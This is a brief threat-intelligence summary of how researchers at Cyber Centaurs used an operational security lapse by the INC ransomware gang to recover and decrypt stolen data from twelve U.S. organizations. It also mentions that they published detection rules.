An operational security failure let researchers recover encrypted data stolen by the INC ransomware gang from a dozen U.S. organizations. Cyber Centaursβ forensic analysis exposed reused Restic-based backup infrastructure that retained victim data, enabling decryption and preservation while producing detection rules and coordinating with law enforcement. #RainINC #Restic
Keypoints
- An operational security failure let Cyber Centaurs access attacker infrastructure and recover stolen data from 12 U.S. organizations.
- Investigators found Restic artifacts, hardcoded credentials, renamed binaries, and PowerShell scripts indicating long-lived backup repositories.
- Encrypted backups on attacker-controlled S3 repositories contained data exfiltrated during unrelated ransomware incidents.
- Researchers decrypted and preserved victim data and coordinated with law enforcement to validate ownership and handle evidence.
- Cyber Centaurs published YARA and Sigma rules and an inventory of INC tooling to help defenders detect similar activity.